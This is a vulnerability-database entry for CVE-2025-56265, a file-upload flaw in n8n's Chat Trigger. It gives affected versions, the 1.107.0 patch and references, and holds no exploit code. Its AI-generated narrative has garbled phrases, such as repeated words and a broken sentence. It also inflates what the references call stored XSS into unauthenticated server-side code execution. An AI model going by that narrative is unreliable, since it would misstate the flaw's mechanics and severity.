CVE-2025-56265
Description
An arbitrary file upload vulnerability in the Chat Trigger component of N8N v1.95.3, v1.100.1, and v1.101.1 allows attackers to execute arbitrary code via uploading a crafted HTML file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An arbitrary file upload vulnerability in n8n's Chat Trigger component allows attackers to execute arbitrary code via a crafted HTML file.
Vulnerability
Overview
CVE-2025-56265 describes an arbitrary file upload vulnerability in the Chat Trigger component of n8n, a workflow automation platform. The vulnerability affects versions v1.95.3, v1.100.1, and v1.101.1 [1]. The root cause is insufficient validation of uploaded files, allowing an attacker to upload a crafted HTML file that can lead to arbitrary code execution.
##
To exploit this vulnerability, an attacker must have access to the Chat Trigger node within an n8n workflow. The attack does not require authentication if the Chat Trigger is exposed to unauthenticated users, as is common in public-facing workflows. By uploading a malicious HTML file, the attacker can inject scripts that execute in the context of the n8n8n's editor or webhook processing [2]. The fix in version 1.107.0 includes sanitization of user input to prevent XSS and arbitrary file uploads [2][4].
##
Successful exploitation allows an attacker to execute arbitrary code on the n8n server, potentially leading to full compromise of the workflow automation environment. This could result in data exfiltration, lateral movement, lateral movement, or disruption of automated processes. The vulnerability is considered critical due to the potential for remote code execution without authentication.
##
The vulnerability has been patched in n8n version 1.107.0, released on 2025-08-11 [2]. Users are strongly advised to upgrade to this version or later. The fix. The patch includes comprehensive sanitization of the initialMessages parameter and i18n config values using the sanitize-html library, as well as removal of dangerous protocols, and extensive security test coverage [4]. No workarounds are available for unpatched versions.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
@n8n/n8n-nodes-langchainnpm | < 1.107.0 | 1.107.0 |
Affected products
2- N8N/N8Ndescription
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
7- github.com/advisories/GHSA-v2x8-97xq-8xrrghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2025-56265ghsaADVISORY
- github.com/n8n-io/n8n/pull/18148ghsaWEB
- github.com/n8n-io/n8n/releases/tag/n8n%401.107.0ghsaWEB
- github.com/nikolas-ch/CVEs/blob/main/N8N/N8N_v1.100.1/ChatTrigger_StoredXSSviaUnrestrictedFileUpload/StoredXSSviaUnristrictedFileUpload.txtghsaWEB
- github.com/nikolas-ch/CVEs/tree/main/N8N/N8N_v1.100.1mitre
- github.com/nikolas-ch/CVEs/tree/main/N8N/N8N_v1.100.1/ChatTrigger_StoredXSSviaUnrestrictedFileUploadmitre
News mentions
0No linked articles in our index yet.